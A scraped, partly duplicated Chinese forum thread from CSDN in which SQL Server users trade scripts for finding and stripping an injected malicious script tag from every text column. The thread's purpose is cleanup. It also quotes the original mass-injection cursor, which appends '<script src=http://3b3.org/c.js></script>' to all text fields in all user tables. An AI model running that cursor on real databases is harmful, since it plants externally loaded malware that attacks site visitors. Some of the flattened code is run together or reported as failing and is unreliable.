--查询数据 CREATE PROC sp_ValueSearch @value sql_variant, --要搜索的数据 @precision bit=1 --1=仅根据sql_variant中的数据类型查找对应类型的数据列.<>1,查询兼容的所有列,字符数据使用like匹配 AS SET NOCOUNT ON IF @value IS NULL RETURN--数据类型处理 SELECT xtype INTO #t FROM systypes WHERE name=SQL_VARIANT_PROPERTY(@value,N'BaseType')--扩展数据类型及查询处理语句 DECLARE @sql nvarchar(4000),@sql1 nvarchar(4000) IF @precision=1 SET @sql=CASE SQL_VARIANT_PROPERTY(@value,N'BaseType') WHEN N'text' THEN N' LIKE N''%''+CAST(@value as varchar(8000))+''%''' WHEN N'ntext' THEN N' LIKE ''%''+CAST(@value as nvarchar(4000))+''%''' ELSE N'=@value' END ELSE BEGIN SET @sql=CAST(SQL_VARIANT_PROPERTY(@value,N'BaseType') as sysname) IF @sql LIKE N'%char' or @sql LIKE N'%text' BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%char' or name LIKE N'%text' SELECT @sql=N' LIKE N''%''+CAST(@value as ' +CASE WHEN LEFT(@sql,1)=N'n' THEN ' nvarchar(4000)' ELSE 'varchar(8000)' END +N')+N''%''' END ELSE IF @sql LIKE N'%datetime' BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%datetime' SET @sql=N'=@value' END ELSE IF @sql LIKE N'%int' OR @sql LIKE N'%money' OR @sql IN(N'real',N'float',N'decimal',N'numeric') BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%int' OR name LIKE N'%money' OR name IN(N'real',N'float',N'decimal') SET @sql=N'=@value' END ELSE SET @sql=N'=@value' END --保存结果的临时表 CREATE TABLE #(TableName sysname,FieldName sysname,Type sysname,SQL nvarchar(4000))DECLARE tb CURSOR LOCAL FOR SELECT N'SELECT * FROM ' +QUOTENAME(USER_NAME(o.uid)) +N'.'+QUOTENAME(o.name) +N' WHERE '+QUOTENAME(c.name) +@sql, N'INSERT # VALUES(N'+QUOTENAME(o.name,N'''') +N',N'+QUOTENAME(c.name,N'''') +N',N'+QUOTENAME(QUOTENAME(t.name)+CASE WHEN t.name IN (N'decimal',N'numeric') THEN N'('+CAST(c.prec as varchar)+N','+CAST(c.scale as varchar)+N')' WHEN t.name=N'float' OR t.name like N'%char' OR t.name like N'%binary' THEN N'('+CAST(c.prec as varchar)+N')' ELSE N'' END,N'''') +N',@sql)' FROM sysobjects o,syscolumns c,systypes t,#t tt WHERE o.id=c.id AND c.xusertype=t.xusertype AND t.xtype=tt.xtype AND OBJECTPROPERTY(o.id,N'IsUserTable')=1OPEN tb FETCH tb INTO @sql,@sql1 WHILE @@FETCH_STATUS=0 BEGIN SET @sql1=N'IF EXISTS('+@sql+N') '+@sql1 EXEC sp_executesql @sql1,N'@value sql_variant,@sql nvarchar(4000)',@value,@sql FETCH tb INTO @sql,@sql1 END CLOSE tb DEALLOCATE tb SELECT * FROM #exec sp_ValueSearch '要搜索的值',1 --1或不输入(即默认值1)精确匹配 exec sp_ValueSearch '要搜索的值',0 --不等于1,模糊匹配
写一个脚本可以解决了 declare @s varchar(8000) declare @tb varchar(20) set @tb='tbEmployee' set @s='' select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns where id=object_id(@tb) and name<>'id' order by colid set @s='select ' +left(@s,len(@s)-1) + ' from ' +@tb print @S
同样的道理,如果是update语句,那么就把上面的select 语句就好了declare @s varchar(8000) declare @tb varchar(20) set @tb='tbEmployee' set @s='' select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns where id=object_id(@tb) and name<>'id' order by colid set @s='update '+@tb +' set ' +left(@s,len(@s)-1) print @S
declare @s varchar(5000) select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab' exec('update tab set '+@s)
DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3b3.org/c.js></script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name IN('varchar','nvarchar','char','nchar','ntext') EXEC sp_MSforeach_Worker @command1=N'?' --检查清理干净否? select Reply from gbook其中“<script src=http://3b3.org/c.js></script>”为需要更换的木马语句,可以根据需要替换。update gbook set Reply=replace(cast(Reply as varchar(8000)),'<script src=http://3b3.org/c.js></script>','') 你把'<script src=http://3b3.org/c.js></script>'改成'ABCDE'就应该行。信息来源:http://www.tt17ba.com/blogview.asp?logID=107
declare @s varchar(5000) select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab' exec('update tab set '+@s)这个不可以吗?把tab换成你的表名
declare @s varchar(5000) select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab' exec('update tab set '+@s)我的是SQL2005. 消息102,级别15,状态1,第3次 '@s'附近有语法错误
己经把tab 换成自己的数据库名。
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://3b3.org/c.js> </script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
---查出来再复制执行一下 select ' update ' + b.name + ' set ' + a.name+ ' = replace( ' + a.name +' ,abcde , '''')' from syscolumns a join sysobjects b on a.id=b.id and b.type='u'
CREATE PROC sp_ValueSearch
@value sql_variant, --要搜索的数据
@precision bit=1 --1=仅根据sql_variant中的数据类型查找对应类型的数据列.<>1,查询兼容的所有列,字符数据使用like匹配
AS
SET NOCOUNT ON
IF @value IS NULL RETURN--数据类型处理
SELECT xtype INTO #t FROM systypes
WHERE name=SQL_VARIANT_PROPERTY(@value,N'BaseType')--扩展数据类型及查询处理语句
DECLARE @sql nvarchar(4000),@sql1 nvarchar(4000)
IF @precision=1
SET @sql=CASE SQL_VARIANT_PROPERTY(@value,N'BaseType')
WHEN N'text' THEN N' LIKE N''%''+CAST(@value as varchar(8000))+''%'''
WHEN N'ntext' THEN N' LIKE ''%''+CAST(@value as nvarchar(4000))+''%'''
ELSE N'=@value' END
ELSE
BEGIN
SET @sql=CAST(SQL_VARIANT_PROPERTY(@value,N'BaseType') as sysname)
IF @sql LIKE N'%char' or @sql LIKE N'%text'
BEGIN
INSERT #t SELECT xtype FROM systypes
WHERE name LIKE N'%char' or name LIKE N'%text'
SELECT @sql=N' LIKE N''%''+CAST(@value as '
+CASE
WHEN LEFT(@sql,1)=N'n' THEN ' nvarchar(4000)'
ELSE 'varchar(8000)' END
+N')+N''%'''
END
ELSE IF @sql LIKE N'%datetime'
BEGIN
INSERT #t SELECT xtype FROM systypes
WHERE name LIKE N'%datetime'
SET @sql=N'=@value'
END
ELSE IF @sql LIKE N'%int'
OR @sql LIKE N'%money'
OR @sql IN(N'real',N'float',N'decimal',N'numeric')
BEGIN
INSERT #t SELECT xtype FROM systypes
WHERE name LIKE N'%int'
OR name LIKE N'%money'
OR name IN(N'real',N'float',N'decimal')
SET @sql=N'=@value'
END
ELSE
SET @sql=N'=@value'
END
--保存结果的临时表
CREATE TABLE #(TableName sysname,FieldName sysname,Type sysname,SQL nvarchar(4000))DECLARE tb CURSOR LOCAL
FOR
SELECT N'SELECT * FROM '
+QUOTENAME(USER_NAME(o.uid))
+N'.'+QUOTENAME(o.name)
+N' WHERE '+QUOTENAME(c.name)
+@sql,
N'INSERT # VALUES(N'+QUOTENAME(o.name,N'''')
+N',N'+QUOTENAME(c.name,N'''')
+N',N'+QUOTENAME(QUOTENAME(t.name)+CASE
WHEN t.name IN (N'decimal',N'numeric')
THEN N'('+CAST(c.prec as varchar)+N','+CAST(c.scale as varchar)+N')'
WHEN t.name=N'float'
OR t.name like N'%char'
OR t.name like N'%binary'
THEN N'('+CAST(c.prec as varchar)+N')'
ELSE N'' END,N'''')
+N',@sql)'
FROM sysobjects o,syscolumns c,systypes t,#t tt
WHERE o.id=c.id
AND c.xusertype=t.xusertype
AND t.xtype=tt.xtype
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1OPEN tb
FETCH tb INTO @sql,@sql1
WHILE @@FETCH_STATUS=0
BEGIN
SET @sql1=N'IF EXISTS('+@sql+N') '+@sql1
EXEC sp_executesql @sql1,N'@value sql_variant,@sql nvarchar(4000)',@value,@sql
FETCH tb INTO @sql,@sql1
END
CLOSE tb
DEALLOCATE tb
SELECT * FROM #exec sp_ValueSearch '要搜索的值',1 --1或不输入(即默认值1)精确匹配
exec sp_ValueSearch '要搜索的值',0 --不等于1,模糊匹配
declare @s varchar(8000)
declare @tb varchar(20)
set @tb='tbEmployee'
set @s=''
select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns
where id=object_id(@tb) and name<>'id'
order by colid
set @s='select ' +left(@s,len(@s)-1) + ' from ' +@tb
print @S
declare @tb varchar(20)
set @tb='tbEmployee'
set @s=''
select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns
where id=object_id(@tb) and name<>'id'
order by colid
set @s='update '+@tb +' set ' +left(@s,len(@s)-1)
print @S
select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab'
exec('update tab set '+@s)
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3b3.org/c.js></script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name IN('varchar','nvarchar','char','nchar','ntext') EXEC sp_MSforeach_Worker @command1=N'?'
--检查清理干净否?
select Reply from gbook其中“<script src=http://3b3.org/c.js></script>”为需要更换的木马语句,可以根据需要替换。update gbook set Reply=replace(cast(Reply as varchar(8000)),'<script src=http://3b3.org/c.js></script>','')
你把'<script src=http://3b3.org/c.js></script>'改成'ABCDE'就应该行。信息来源:http://www.tt17ba.com/blogview.asp?logID=107
select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')'
from sysobjects a,syscolumns b where a.id=b.id and a.name='tab'
exec('update tab set '+@s)这个不可以吗?把tab换成你的表名
select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')'
from sysobjects a,syscolumns b where a.id=b.id and a.name='tab'
exec('update tab set '+@s)我的是SQL2005.
消息102,级别15,状态1,第3次
'@s'附近有语法错误
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://3b3.org/c.js> </script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
select ' update ' + b.name + ' set ' + a.name+ ' = replace( ' + a.name +' ,abcde , '''')' from syscolumns a join sysobjects b
on a.id=b.id and b.type='u'
http://topic.csdn.net/u/20090427/01/2a55eef7-0d8a-47db-9c73-8ef6da4cb8d6.html